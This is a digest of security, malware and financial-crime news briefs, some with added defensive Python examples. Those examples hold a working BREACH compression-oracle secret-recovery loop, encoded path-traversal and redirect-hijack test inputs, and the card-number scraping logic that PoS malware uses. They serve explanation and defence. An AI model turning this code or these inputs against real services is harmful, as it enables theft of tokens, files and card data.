Vulnerabilities continue to plague industrial control systems. The DHS Industrial Control Systems-Computer Emergency Readiness Team (ICS-CERT) released three security advisories on industrial control systems (ICS) that detailed vulnerabilities originally found and reported by independent researchers. The advisories indicated that critical infrastructure and industrial networks were still inundated with serious flaws.
Hackers will break into email, social media accounts for just $129. Dell SecureWorks released a report on the underground hacker market, where customers can hire a hacker to compromise a Gmail, Hotmail, or Yahoo account for $129, or a corporate email account for $500. The report also stated that the underground market offers a plethora of other hacking services to paying customers, including attacks on the commercial facilities sector, the transportation sector, and the financial sector, among others.
Minister convicted in $5 million tax scam. A traveling minister from Arkansas was convicted April 5 for his role in a nearly $5 million fraudulent tax return scheme where he and a co-conspirator allegedly filed over 2,700 fraudulent tax returns on behalf of church members in Ohio and other States after obtaining church members’ personal information by claiming to help the members procure government stimulus funds. The minister and co-conspirator took fees from each tax refund while congregants received the balance.
Serial ‘bandage’ bank bandit. The FBI announced a search April 5 for a bank robber dubbed the “Bandage” who robbed a Sandy Spring Bank branch in Burtonsville and a Capital One Bank branch in Elkridge April 1. Authorities stated that the man is suspected of robbing seven other banks in Maryland since October 2015.
Windows’ Pirrit adware ported to OS X via Qt Framework. A security researcher from Cybereason discovered that the OSX/Pirrit adware was infecting Apple Mac users for the first time, hijacking users’ Web traffic to inject ads; the adware was ported to OS X via the Qt Framework, which allows programmers to write applications that run on Apple Mac, Linux, and Microsoft Windows systems. The malware takes several steps to infiltrate a system after a user launches a Pirrit-laced binary.
Adobe to patch actively exploited Flash zero-day. Adobe reported April 5 that it would release a patch April 7 for Flash Player, covering the affected version and earlier versions, to address a zero-day vulnerability that malicious attackers were seen actively exploiting. Customers were advised to ensure their Flash Player was updated to the patched version or later as soon as it became available.
Two former senior executives of global financial services company charged in scheme to defraud clients through secret trading commissions on billions of dollars in securities trades. Two former executives of a Boston-based financial services company were charged in an indictment unsealed April 5 for their roles in a scheme where the duo and co-conspirators allegedly added secret commissions to billions of dollars of fixed income and equity trades performed for at least six clients of the bank’s transition management business, thereby overcharging the clients by millions of dollars. The indictment also alleges that from February 2010 to September 2011 the pair took action to hide the commission from the clients and other bank employees.
Researchers bypass patch for old IBM Java flaw. The founder and chief executive officer (CEO) of Security Explorations reported that a sandbox escape vulnerability in IBM Java, which was previously patched in 2013, could still be exploited by attackers after discovering the flaw could be abused by making minor modifications to the proof-of-concept (PoC) code published by the company in July 2013. A patch has yet to be released, but IBM was working to release a fix.
Top Firefox extensions can hide silent malware using easy pre-fab tool. Two U.S. security researchers reported at the Black Hat Asia 2016 security conference that Mozilla Firefox extensions were open to attacks that can compromise machines and pass both automated and human review, through extension-reuse attacks that exploit weaknesses in the structure of Firefox extensions to disguise malicious activity as legitimate functionality.
Path traversal flaw found in ICONICS WebHMI. A German researcher discovered that ICONICS’ WebHMI product was affected by a directory traversal flaw that could allow a remote attacker to access configuration files storing password hashes and other information by sending a crafted request to a vulnerable WebHMI installation over the Internet. ICONICS has not released a patch and advised users to avoid exposing the product to the Internet.
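A traversal check only holds if it runs after the request path has been percent-decoded and normalized; otherwise encoded or nested “..” sequences walk straight past it. The following added example (not ICONICS’ code) shows the traversal-prone join beside a resolver that decodes, collapses “..” and symlinks, and then verifies the result still lies inside the web root. The web root path and the hypothetical request paths are placeholders for the example.

```python
import os
from pathlib import Path
from typing import Optional
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested path would escape the web root."""


def vulnerable_resolve(web_root: str, requested: str) -> str:
    """The traversal-prone pattern: trust the request and join it onto the root.

    ".." is kept, and an absolute second argument discards the root entirely.
    """
    return os.path.join(web_root, requested)


def safe_resolve(web_root: str, requested: str) -> Path:
    """Resolve `requested` under `web_root`, refusing anything that escapes it."""
    if "\x00" in requested or "\\" in requested:
        # NUL bytes truncate paths in C code; backslashes are separators on Windows.
        raise TraversalError(requested)
    root = Path(web_root).resolve()
    # resolve() collapses "." and ".." and follows symlinks before the check,
    # so "a/../../etc" and symlink tricks are judged by where they really land.
    target = (root / requested.lstrip("/")).resolve()
    if target != root and root not in target.parents:
        raise TraversalError(requested)
    return target


def resolve_request(web_root: str, url_path: str) -> Optional[Path]:
    """Map a raw HTTP path to a file under the web root, or None if it is not allowed.

    Percent-decoding happens before the check so "..%2F" cannot slip past it.
    """
    try:
        return safe_resolve(web_root, unquote(url_path))
    except TraversalError:
        return None


if __name__ == "__main__":
    root = "/srv/webhmi/www"  # placeholder web root
    for p in ("/pages/index.html", "/..%2F..%2Fconfig/users.ini", "/pages/../../config.ini"):
        print(p, "->", vulnerable_resolve(root, unquote(p).lstrip("/")), "|", resolve_request(root, p))
```

Containment is checked on the resolved path, not on the request string, which is why the check survives double-encoding and symlinked directories; a separate allowlist of servable extensions is still worth adding in front of it.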
HTTP compression continues to put encrypted communications at risk. Security researchers from the National Technical University of Athens reported at the Black Hat Asia 2016 security conference that they had improved the Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext (BREACH) attack to make it practical against Transport Layer Security (TLS) block ciphers such as the Advanced Encryption Standard (AES), with the attacker intercepting the victim’s Web traffic through a router on a wireless network.
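The reason compression leaks secrets is that a compressed response shrinks when attacker-controlled input repeats text that is already in the page. The following added example (not the researchers’ code) recovers a constructed CSRF token one character at a time from response size alone. It replaces DEFLATE with a stylised LZ77 cost model so the result is deterministic and the mechanism is visible; a real BREACH attack additionally contends with Huffman-coding and block-cipher padding noise, which is what the improvements reported above address. The page template, token, alphabet and oracle are all constructed for the example, and the recovery loop generalizes to any secret that follows a known prefix in the response.

```python
# Stylised DEFLATE costs (no Huffman stage): one literal token vs one
# back-reference token. Real DEFLATE and TLS padding add noise on top of
# this; the attack logic is the same.
LITERAL_BITS = 9
MATCH_BITS = 17
MIN_MATCH = 3

SECRET = "7f3a9c1e"  # constructed CSRF token standing in for the real one


def lz77_cost_bits(data: bytes) -> int:
    """Greedy LZ77 token cost of `data`: a stand-in for the compressed size."""
    i, cost = 0, 0
    while i < len(data):
        best = 0
        for j in range(i):  # longest earlier match for the text starting at i
            n = 0
            while i + n < len(data) and data[j + n] == data[i + n]:
                n += 1
            best = max(best, n)
        if best >= MIN_MATCH:
            cost += MATCH_BITS
            i += best
        else:
            cost += LITERAL_BITS
            i += 1
    return cost


def render_page(reflected: str) -> bytes:
    """Constructed response: a secret token and an attacker-controlled reflection."""
    html = (
        "<html><body>"
        f"<form><input type='hidden' name='csrf' value='{SECRET}'></form>"
        f"<p>No results for: {reflected}</p>"
        "</body></html>"
    )
    return html.encode()


def oracle(reflected: str) -> int:
    """What the attacker observes: the size of the (compressed, encrypted) response."""
    return lz77_cost_bits(render_page(reflected))


def breach_recover(oracle, prefix: str, alphabet: str, length: int) -> str:
    """Recover `length` secret characters that follow `prefix` in the page.

    Each round reflects prefix+known+c for every c; the correct c extends the
    back-reference by one character, so that response is the smallest.
    """
    known = ""
    for _ in range(length):
        sizes = {c: oracle(prefix + known + c) for c in alphabet}
        smallest = min(sizes.values())
        winners = [c for c, s in sizes.items() if s == smallest]
        if len(winners) != 1:
            raise RuntimeError(f"ambiguous guess after {known!r}: {winners}")
        known += winners[0]
    return known


if __name__ == "__main__":
    print(breach_recover(oracle, "value='", "0123456789abcdef", len(SECRET)))
```

The defence is to remove the oracle rather than to tune the cipher: do not compress responses that echo request data alongside secrets, or mask each secret per response (for example, XOR it with a fresh random value that is sent with it) so that the same token never compresses the same way twice.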
Chrome extension caught hijacking users’ browsers. Google reported that it removed the Better History Chrome extension from its Web Store after users reported that the extension redirected them through a Hypertext Transfer Protocol (HTTP) link that led to an extra Web page displaying several types of advertisements. The extra page also collected analytics on users that could later be sold to advertisers.
Google fixes another 40 security bugs in Android’s April update. Google released an Android Security Advisory patching 40 security flaws including 15 critical bugs in Android devices running versions 4.4.4 and higher, that could have allowed an attacker to root and permanently compromise the device. In addition, multiple remote code execution (RCE) flaws were patched in Dynamic Host Configuration Protocol Client Daemon (DHCPCD) service, Media Codec, Mediaserver component, and the libstagefright library, among other patched vulnerabilities.
iOS app patching tool “rollout” prone to abuse. Security researchers from FireEye reported that another quick-patching solution for Apple iOS applications, Rollout.io, which runs on 35 million devices, could be abused by malicious hackers to integrate a malicious third-party advertising software development kit (SDK) into a legitimate app and potentially turn harmless iOS apps into malware.
Thousands of cards compromised in ATM scam. Authorities announced April 1 that a man was charged after he allegedly placed skimming devices on Wells Fargo ATMs throughout San Diego County, compromising at least 4,870 credit and debit cards with losses exceeding $428,000 through the use of counterfeit cards. The man also withdrew money from customer accounts, purchased merchandise from local Walmarts, and transmitted over $114,000 in funds via MoneyGrams to Jordan, Belgium, China, Bulgaria, and Moldova.
Elusive Midday Bandit robs 11th bank: FBI. The FBI is searching for a man dubbed the “Midday Bandit” who is suspected of robbing the MB Financial Bank branch in Oak Lawn, Illinois, March 31. Authorities stated that the man is suspected of robbing 10 other Chicago-area banks since June 2014.
Ex-furniture company exec pleads guilty in $18M loan fraud. The former chief financial officer (CFO) of New Jersey-based Munire Furniture Inc., and an affiliated Indiana company pleaded guilty to Federal charges April 1 after the CFO falsified the companies’ financial conditions by inflating sales and revenue numbers beginning in 2011 in order to get $17 million in loans from a Manhattan bank and $1 million in municipal loans from Gas City, Indiana, so the companies could continue business. Officials stated that the companies defaulted on the $18 million loans.
Authentication flaw in Microsoft accounts gets researcher $13,000 reward. Microsoft patched a cross-site request forgery (CSRF) flaw in its main authentication system after a security researcher found that attackers could obtain victims’ authentication tokens for Azure, Outlook, and Office services by altering the “wreply” parameter so that the tokens were sent to an attacker-controlled Web site, because the “wreply” Uniform Resource Locator (URL) was not properly validated.
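The wreply bug is the general return-URL problem: a sign-in endpoint must not hand a token to whatever URL the request names. The following added example (not Microsoft’s code) shows the flawed pattern beside a check that accepts only absolute HTTPS URLs whose host is on an allowlist and rejects the host-confusion forms attackers use (userinfo “@” tricks, scheme-relative URLs, suffix domains, backslashes). The allowlist hosts and the token are assumptions for the example.

```python
from urllib.parse import urlsplit, urlunsplit, urlencode

# Hosts that may receive a token after sign-in (assumed allowlist for the example).
ALLOWED_RETURN_HOSTS = {"login.example.com", "mail.example.com"}


def vulnerable_redirect(token: str, wreply: str) -> str:
    """The flawed pattern: send the token wherever the request says."""
    return f"{wreply}?{urlencode({'token': token})}"


def is_safe_return_url(wreply: str) -> bool:
    """Accept only absolute https URLs whose host is exactly on the allowlist."""
    if not wreply or any(ch in wreply for ch in "\\\r\n\t\x00"):
        return False  # backslash/CR/LF/NUL are parsed differently by different stacks
    parts = urlsplit(wreply)
    if parts.scheme.lower() != "https":
        return False  # rejects javascript:, data:, http: and scheme-relative "//evil"
    if parts.username is not None or parts.password is not None:
        return False  # https://login.example.com@evil.test/ would otherwise pass a naive check
    host = (parts.hostname or "").lower()
    return host in ALLOWED_RETURN_HOSTS  # exact match: no suffix or prefix tricks


def safe_redirect(token: str, wreply: str) -> str:
    """Rebuild the return URL from its validated parts and append the token."""
    if not is_safe_return_url(wreply):
        raise ValueError("wreply rejected")
    parts = urlsplit(wreply)
    query = parts.query + ("&" if parts.query else "") + urlencode({"token": token})
    # Fragment is dropped: it never reaches the server and can hide an "@evil" tail.
    return urlunsplit((parts.scheme, parts.netloc, parts.path or "/", query, ""))


if __name__ == "__main__":
    for url in ("https://login.example.com/cb", "https://login.example.com@evil.test/",
                "//login.example.com/cb", "https://login.example.com.evil.test/"):
        print(url, "->", is_safe_return_url(url))
```

Compare hosts exactly against the list rather than with prefix or suffix matching, and keep the list server-side; the original request’s wreply is only ever used after it passes this check.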
Romanian hacker “Guccifer” appears in U.S. court. A Romanian national was extradited to the U.S. for a period of 18 months after U.S. authorities stated the man allegedly hacked into the email and social media accounts of two former presidents, a former cabinet member, a former presidential advisor, and a former member of the U.S. Joint Chiefs of Staff, among other people, and released victims’ personal information including private emails, personal photographs, and medical and financial data from December 2012 – January 2014.
Hackers can unlock any HID door controller with one UDP packet. A security researcher from Trend Micro discovered a design vulnerability in HID Global’s door controllers, specifically in the VertX and Edge products, that can allow an attacker to send a single malicious User Datagram Protocol (UDP) request to a controller and unlock the door and/or deactivate the alarm. An attacker could also execute remote commands on the devices with root privileges because both products run a daemon named discoveryd that listens on UDP port 4070 and answers queries with information about the device.
Four arrested in Calhoun County for allegedly possessing over 100 fraudulent credit cards. Authorities from the Calhoun County Sheriff’s Office in Michigan announced April 1 that 4 Chicago-area residents were arrested the week of March 28 after police found about 150 fraudulent credit cards from other countries in the group’s vehicle. Police were alerted to the suspects’ vehicle after a gas station attendant notified the police about possible credit card fraud.
200 fake credit cards set off bomb detector at Midway, prosecutors say. Officials at Chicago Midway International Airport discovered a total of 200 fraudulent gift cards and debit cards March 29 after the magnetic strips on the cards triggered a bomb detector in airport security. Authorities stated that the fraudulent cards were found wrapped in shoes and socks.
Code execution flaw found in Lhasa decompression library. Lhasa released version 0.3.1 for its open source tool and library product addressing an integer underflow vulnerability after Cisco TALOS researchers found hackers could exploit the flaw for arbitrary code execution by tricking victims into opening a specially crafted file, as well as through file scanning systems that leverage the vulnerable library to read the content of LZH and LHA files.
Rokku ransomware uses QR codes to help you pay for your files. Security researchers from Avira discovered a new ransomware named Rokku, distributed via spam emails with malicious attachments that launch the encryption process when opened; Rokku encrypts victims’ files, appends the “.rokku” extension to each, and presents a QR code to help victims pay the ransom.
SideStepper attack targets corporate iOS devices. Security researchers from Check Point discovered a new attack method dubbed SideStepper that targets Apple iOS devices used in enterprise environments and enrolled in Mobile Device Management (MDM). An attacker sends a malicious configuration profile to the device via email, instant messaging (IM), or short message service (SMS); once installed, it enables a trivial man-in-the-middle (MitM) attack on the device’s MDM communications, allowing the attacker to bypass iOS security protections and install malicious apps signed with a legitimate enterprise certificate.
Police bust major credit card fraud operation. Officials from the Atlanta Police Department and the U.S. Secret Service are investigating a half-million dollar credit card fraud operation after Atlanta police discovered approximately 366 fraudulent credit cards with different numbers, multiple credit card-making machines, and $330,000 worth of computers in an Atlanta apartment March 30. Officials stated the suspects allegedly purchased computers at Best Buy with the fraudulent credit cards and sold the devices internationally, and that they committed fraud using aliases at banks in the U.S., Germany, Denmark, and the Bank of China.
California wholesale executive pleads guilty for role in $9 million bank fraud scheme. The former vice president of Eastern Tools and Equipment, Inc., in Ontario, California, pleaded guilty March 30 to Federal charges after he and co-conspirators defrauded East West Bank in Pasadena of $9 million from 2007 – 2012 by making material misrepresentations to the bank about the company’s accounts receivable and financial statements, creating shell corporations to act as suppliers and retailers doing business with Eastern Tools, and defaulting on the promissory note issued by the bank. Officials stated that the executive and his co-conspirators prolonged the scheme by opening post office boxes, phone accounts, and email accounts claiming to be associated with the shell retail companies in order to make them appear as independent entities to East West Bank.
Malware detection bypass vulnerability found in Cisco firepower. Cisco released software updates fixing a high severity vulnerability in Cisco Firepower after a researcher found that improper validation of Hypertext Transfer Protocol (HTTP) header fields could allow a remote, unauthenticated attacker to bypass the malicious file detection and blocking features by sending a crafted HTTP request through the affected system.
Patch out for ‘ridiculous’ Trend Micro command execution vuln. Trend Micro released a patch that fixed a command execution vulnerability for systems running its Maximum Security, Premium Security or Password Management software after a security researcher from Google’s Project Zero found a remote debugging server was running on customers’ machines. Officials stated the patch was not fully complete, but will fix most critical issues with the software.
Security bug allowed attackers to send malicious emails via PayPal’s servers. PayPal Holdings, Inc., patched a flaw in one of its automated emailing applications after a security researcher from Vulnerability Lab found that attackers could insert malicious code into an account’s username, which was then embedded unchanged in emails sent to other recipients. The flaw could allow an attacker to hijack sessions, redirect recipients to external sites, and trick users into clicking a malicious link that prompts them to enter their PayPal credentials.
Police: 2 men wanted in ATM skimming device incidents in Brooklyn, Queens. Officials from the New York City Police Department and the FBI are searching March 29 for two men suspected of installing and removing ATM skimming devices at five different TD Bank locations in Brooklyn and Queens, New York, from September 2015 – November 2015.
Repeated DDoS attacks force Coinkite Bitcoin wallet to close down web service. Coinkite, one of the first Web-based bitcoin wallet services, reported March 28 that it will close its Web-based wallet service and focus solely on developing its hardware products after its services suffered near-constant distributed denial-of-service (DDoS) attacks for the past three years. The company warned users of potential phishing scams that may try to trick them into revealing their account credentials or sending bitcoins to the wrong address.
Montgomery man pleads guilty in $2.5 million fraud case. Two Pennsylvania men and a New York resident pleaded guilty March 28 to Federal charges alleging that the trio defrauded banks from 2007 – 2015 by lying about their income in order to secure over $2.5 million in fraudulent loans and lines of credit from banks and credit unions, then defaulting on the loans. Officials from the U.S. Attorney’s Office for the Southern District of New York stated that the trio used the loans to pay off credit card purchases, business expenses, and other loans to conceal the fraud.
Connecticut insurance salesman convicted of tax fraud. The U.S. Department of Justice Tax Division announced March 28 that a Connecticut-based insurance salesman was found guilty of tax fraud after he attempted to obstruct the U.S. Internal Revenue Service (IRS) by filing 3 false tax returns for 2007, including a fraudulent request for a $14 million refund, sending false and threatening correspondence to the IRS to defeat its assessment, collection, and investigative efforts, and by submitting threatening correspondence to those insurance companies that cooperated with IRS activities. Officials stated the salesman also established nominee entities to divert his insurance commissions in order to conceal assets and prevent the IRS from collecting on his tax liabilities.
“Vaccine” available for CTB-Locker, Locky, TeslaCrypt. French cybersecurity company Lexsi released a “vaccine” that hardens users’ computers against ransomware including CTB-Locker, Locky, and TeslaCrypt by pre-creating the specific mutex or registry key, or changing the simple system setting, that each of these families checks for before it runs, as long as the modification does not inconvenience other users of the machine.
Thousands of printers “hacked” to spew anti-semitic flyers. A security researcher discovered that hundreds of thousands of Internet-connected printers were exposed to such attacks because many of them accepted print jobs without requiring any authentication. The researcher located the exposed printers with Masscan, a high-speed Internet-wide Internet Protocol (IP) port scanner.
vBulletin servers hacked, admins force password reset for all users. A company official for vBulletin.org and vBulletin.com reported that its Web domains went offline from March 24 – March 25 for an unscheduled maintenance outage and that it forced all users to reset their passwords after hackers accessed the company’s vBulletin Germany (VGB) servers, which hold user information. The attackers reportedly got in through the content management system (CMS) used to run the VGB presentation site.
TreasureHunt PoS malware linked to illegal credit card sharing forum. Researchers from FireEye reported that a new strain of point of sale (PoS) malware, dubbed TreasureHunt was being used by BearsInc, a cyber-crime group, to power its malicious campaign targeting small businesses and banks in the U.S. that have not yet transitioned to the new Europay, MasterCard, and Visa (EMV) chip and Personal Identification Number (PIN) card system. The new strain adds a registry key for boot persistence to a device, scans the device’s memory for credit card information, and encodes and sends the data to a command and control (C&C) server.
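TreasureHunt’s memory scan works because cardholder data sitting in a PoS process has a recognizable shape: track-2 records (PAN, “=”, expiry, service code) and bare 13 to 19 digit PANs that pass the Luhn check. The same logic, written here as an added example rather than the malware’s code, lets a defender audit a memory dump or a captured process buffer for unprotected card data before an attacker does. The memory snippet is constructed and contains only well-known test PANs plus two decoys.

```python
import re

# Track-2 data as read from a magnetic stripe: PAN "=" YYMM service-code ...
TRACK2 = re.compile(rb"(?<!\d)(\d{13,19})=(\d{4})\d{3,}")
# A bare PAN: 13-19 digits not embedded in a longer digit run.
BARE_PAN = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")

# Constructed process-memory snippet: one track-2 record, one bare PAN, and
# two 16-digit decoys (an order number and the track's discretionary data).
SAMPLE_MEMORY = (
    b"\x00\x00POS v2.1\x00"
    b";4111111111111111=2512101123456789?\x00"
    b"order=1234567890123456\x00amount=19.99\x00"
    b"5500000000000004\x00"
)


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit validation, the same filter card-scraping malware applies."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_card_data(buffer: bytes) -> dict:
    """Return {pan: kind} for every Luhn-valid PAN found, preferring track-2 hits."""
    hits = {}
    for m in TRACK2.finditer(buffer):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits[pan] = "track2"
    for m in BARE_PAN.finditer(buffer):
        pan = m.group(1).decode()
        if pan not in hits and luhn_ok(pan):
            hits[pan] = "pan"
    return hits


def mask(pan: str) -> str:
    """PCI-style masking for reporting: first six and last four digits only."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


if __name__ == "__main__":
    for pan, kind in find_card_data(SAMPLE_MEMORY).items():
        print(f"{kind:7} {mask(pan)}")
```

Run against a real dump, the scanner should report masked values only; a hit in a process that is supposed to hold card data only inside a hardware-encrypting reader is the finding, and the regex-plus-Luhn combination keeps order numbers and other long digit runs out of the report.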
Miami men arrested for possessing over 100 fraudulent bank cards. Two Florida men were arrested in Henry County, Georgia, March 22 after authorities found 187 fraudulent bank cards and 2 electronic card skimming devices in the pair’s vehicle after a Police Department K-9 unit detected the illicit materials during a traffic stop, prompting a search of the vehicle.
Securities professional charged with defrauding institutional investors. The U.S. Securities and Exchange Commission charged a New York-based securities professional March 28 after he allegedly solicited approximately $95 million from 2 institutional investors by offering promissory notes issued by Irving Place III SPV LLC, a shell entity with no legitimate business operations, obtained a $25 million investment in November 2015 and used the funds for personal use, and attempted to solicit an additional $70 million from 2 investors using false and misleading statements. The U.S. Attorney’s Office for the Southern District of New York announced March 28 parallel criminal charges against the securities officer.
Honolulu man arrested in credit card scheme involving cyber black market. FBI officials arrested a man from Hawaii March 28 after he allegedly purchased information on the cyber black market to obtain credit cards from Russia, China, and Vietnam as part of an elaborate scheme that used online credit card applications, temporary mail forwarding requests, burner phones, and shopping sprees to steal the identities of over 40 people, open 80 bank accounts with the stolen information, and accumulate over $100,000 in fraudulent credit card activity.
Flaw in Truecaller Android app leaves data of millions of users exposed. Security researchers from Cheetah Mobile Security Research Lab discovered a remotely exploitable flaw in the Truecaller app that exposed the personal information of millions of users and could allow attackers to modify users’ account settings, because the application identified users by their device’s international mobile equipment identity (IMEI) code. Attackers could write scripts that query random IMEI codes to collect users’ data and subsequently use the collected data in spam or phishing campaigns.
Zen Cart patches multiple XSS vulnerabilities. Zen Cart released an updated version to its online open source shopping cart application, Zen Cart 1.5.4 that patched several cross-site scripting (XSS) vulnerabilities after researchers from Trustwave found the flaws in the administrative section of Zen Cart that could result in access to cookies, sensitive information, or site defacement. Researchers advised users to upgrade their software to the latest version to avoid the flaws.
Facebook fixes Instagram issue that allowed account takeover. A Belgian security researcher discovered critical flaws in Instagram that could have allowed an attacker to reset the email addresses attached to an account and then reset the account’s password, after Facebook was found to be printing sensitive Instagram user information on a Web page. In addition, an Insecure Direct Object Reference vulnerability allowed unauthenticated users, including a potential attacker, to access other users’ information.
SEC halts fraud by manager of investments in pre-IPO companies. The U.S. Securities and Exchange Commission (SEC) announced March 25 charges and asset freezes against a New Jersey-based fund manager and 2 share-marketing companies, Saddle River Advisors and SRA Management Associates, after they allegedly stole $5.7 million from investors, diverted millions more to improper and undisclosed uses, failed to register the share offerings with the SEC, and concealed the illicit activity by avoiding outside reviews of the funds, indiscriminately transferring money to more than a dozen bank accounts, and failing to provide investors with financial statements. Officials stated that the manager raised more than $53 million from investors through the 2 funds and used the money to pay off earlier investors, prop up other funds, and pay family-related expenses, thereby leaving his firms unable to buy shares promised to investors.
PowerWare ransomware abuses PowerShell, Office macros. Security researchers from Carbon Black reported a new fileless ransomware, PowerWare, that can allow attackers to disguise malicious commands as legitimate computer activity and execute malicious actions by abusing PowerShell, a core utility of Microsoft Windows systems. The malware was distributed via malicious Word documents that use embedded macros to invoke “cmd.exe” on a target’s computer.
Flaw in StartSSL validation allowed attackers to get SSL certs for any domain. A security researcher discovered a domain validation flaw in the StartSSL certificate authority (CA) Web service that could allow an attacker to obtain Secure Sockets Layer (SSL) certificates for any desired domain by capturing the Hypertext Transfer Protocol (HTTP) request sent to the server and modifying the included parameters so that the certificate was sent to the attacker’s own email address. StartSSL reported that it had patched the flaw.
WordPress attacked 3.5 times more often than non-CMS sites. Security firm Imperva released a report stating that Web attacks increased greatly in 2015, after the company analyzed about 7 generic attack types and more than 24 million alerts for 200 Web applications, which revealed that Structured Query Language (SQL) injections tripled and cross-site scripting (XSS) attacks doubled within the year. In addition, the report found that many attacks targeted Web applications running on standard Content Management System (CMS) platforms, which were attacked three times more often than non-CMS applications, among other findings.
U.S. Federal Agencies vulnerable to data threats: Survey. Vormetric released its 2016 Data Threat Report, which detailed that 90 percent of Information Technology (IT) security executives from large international organizations, including more than 100 executives in the U.S. Federal government, said their organizations were vulnerable to data threats, and that 61 percent of executives admitted that their organization had previously suffered a data breach. The report stated that many entities were planning to increase spending on sensitive data protection, invest in data-at-rest defenses, and implement more efficient data security tools.
Petya ransomware encrypts entire hard drives. Security researchers from G DATA SecurityLabs found a new threat, dubbed Petya ransomware, that has allegedly been encrypting companies’ entire hard drives and locking users out of their systems. The ransomware is delivered via a malicious Dropbox download link included in emails sent to Human Resources (HR) departments; the download contains an executable file that causes the computer to crash and enables the ransomware to manipulate the Master Boot Record (MBR) and ultimately control the computer system. Security researchers advised HR department employees to take extra precaution when offered Dropbox links.
Brazilian trojan conceals malicious code in PNG image. Security researchers from Kaspersky Lab found attackers using a new malware delivery method to avoid detection: a Portable Network Graphics (PNG) image embedded with malicious code, distributed via an email containing a clean PDF file that holds a link to a .zip file with the malicious image. Researchers found that the PNG image cannot be executed without its launcher and therefore cannot be the main infector.
Louisiana check cashers plead guilty to conspiracy, tax charges and agree to forfeit $4.12 million. The two owners of VJ Discount Inc., in Kenner, Louisiana, pleaded guilty March 24 to Federal charges after the pair acted with co-conspirators to defraud the U.S. government and impair the Internal Revenue Service (IRS) by cashing fraudulently obtained tax refund checks at elevated rates, filing false reports with the government to conceal the illicit activity, and filing false tax returns that underreported business and individual income to the IRS, despite third-party check deposits totaling more than $172 million from 2011 – 2013. As part of the guilty pleas, the duo agreed to forfeit $4.12 million.
New York man indicted in $17 million Microcap stock manipulation scheme. The founder of a New York-based registered broker-dealer was indicted on Federal charges March 23 after he allegedly orchestrated a $17.2 million pump-and-dump stock market manipulation scheme in which he and co-conspirators artificially inflated the stock prices of Raven Gold Corporation and Kentucky USA Energy Inc. by pumping the price of the two companies’ shares through manipulative trading, dumping the stocks, and selling large amounts of the shares to investors at inflated rates, causing the companies’ stock prices to drop and investors to suffer losses. Officials stated that two Canadian stock promoters have pleaded guilty for their involvement in the scheme.
7 Iranians indicted for cyber attacks on US banks and a dam. The U.S. Department of Justice reported March 24 that 7 Iranian computer specialists, allegedly sponsored by Iran’s Islamic Revolutionary Guard Corps, were charged for conducting several coordinated distributed denial-of-service (DDoS) attacks against 46 major companies which primarily targeted the U.S. financial sector from 2011 – 2013. The attacks disabled victims’ bank Web sites, prevented customers from accessing online accounts and cost banks tens of millions of dollars in remediation.
Cisco patches serious DoS flaws in IOS software. Cisco released patches for six high severity denial-of-service (DoS) flaws in its IOS, IOS XE, and Unified Communications Manager (UCM) software, including a flaw that can allow an unauthenticated attacker to cause a memory leak, eventually causing the affected device to reload, and a vulnerability in the DHCP version 6 (DHCPv6) relay feature that can cause the affected device to reload when it receives specially crafted DHCPv6 relay messages.
EC Council website hacked to serve Angler Exploit Kit. Security researchers from Fox-IT warned users that the security certification provider EC Council was unknowingly distributing the Angler exploit kit (EK) after discovering that malicious code was embedded at the bottom of EC Council’s iClass Web site for Certified Ethical Hacker (CEH) certification, which redirected users to a Web page hosting the Angler EK. Researchers suspected a security flaw in the Web site and notified the company of the compromise.
Woman captures video of ‘Bearded Bandit’ arrest. The FBI arrested a man dubbed the “Bearded Bandit” in Brentwood, California, March 23, after he allegedly committed 15 bank robberies that totaled $28,000 in theft from the San Francisco Bay Area.
‘Bad Breath Bandit’ strikes again at northern California bank, police say. Authorities are searching for a man dubbed the “Bad Breath Bandit” who is suspected of robbing the El Dorado Savings Bank in Georgetown, California, March 21 at gunpoint. Officials stated that the man is tied to four other bank robberies in northern California in 2014.
Valley City State prof faces ID theft charges after police seize 200 credit cards. A Chinese citizen working as an assistant professor at Valley City State University in North Dakota and Johns Hopkins University in Maryland was arrested March 22 after authorities discovered over 200 credit and gift cards, computers, electronic storage devices, and suspected counterfeit merchandise, among other items, in the professor’s apartment and office. The investigation began after authorities received anonymous photographs revealing the large number of credit cards bearing different names in the suspect’s apartment.
Miami businessman pleads guilty to foreign bribery and fraud charges in connection with Venezuela bribery scheme. The owner of multiple U.S.-based energy companies pleaded guilty March 22 to foreign bribery and Federal fraud charges after he and a co-conspirator participated in a scheme to illicitly secure energy contracts from Venezuela’s state-owned energy company, Petroleos de Venezuela S.A. (PDVSA) by paying bribes and other things of value to PDVSA officials in order to win lucrative energy contracts, ensure spots on PDVSA approved vendor lists, and be given payment priority ahead of other vendors from 2009 – 2015. Officials stated that four other individuals pleaded guilty for their participation in the scheme.
FBI seeks help nabbing bank robber known as ‘Count Down Bandit’. The FBI is searching March 23 for a man dubbed the “Count Down Bandit” who is suspected of committing at least seven robberies at banks around northern New Jersey, with his most recent taking place March 8. The suspect has reportedly targeted Hudson City bank branches.
Sophisticated USB trojan spotted in the wild. Researchers from ESET reported that an advanced data-stealing universal serial bus (USB) trojan dubbed “USB Thief” was found in the wild and can compromise a system by injecting itself into the execution chain of portable versions of popular applications and disguising itself as a plugin or a Dynamic Link Library (DLL) file. The threat is bound to a single USB drive and was reported to consist of four executables and two configuration files that enable it to avoid detection and hinder researchers from copying and analyzing the malware.
OS X zero day bug allows hackers to bypass system integrity protection. A security researcher discovered a non-memory-corruption flaw in Apple Inc.’s OS X operating system that could allow an attacker to compromise OS X and iOS systems by executing arbitrary code on any binary, escalating the attacker’s privileges to root, and/or bypassing Apple’s System Integrity Protection feature. Researchers stated the zero-day vulnerability was not exploited by attackers, but the flaw could potentially be used in highly targeted or state-sponsored attacks.
Oracle reissues patch for two-year-old Java flaw. Oracle Corporation released updates for two of its Java SE products addressing a sandbox escape flaw after researchers discovered the previously patched flaw could be bypassed by a remote, unauthenticated attacker who tricks users into visiting a malicious Web site. The new update successfully patches the flaw in Java SE 8 Update 77 and Java SE 7 Update 99.
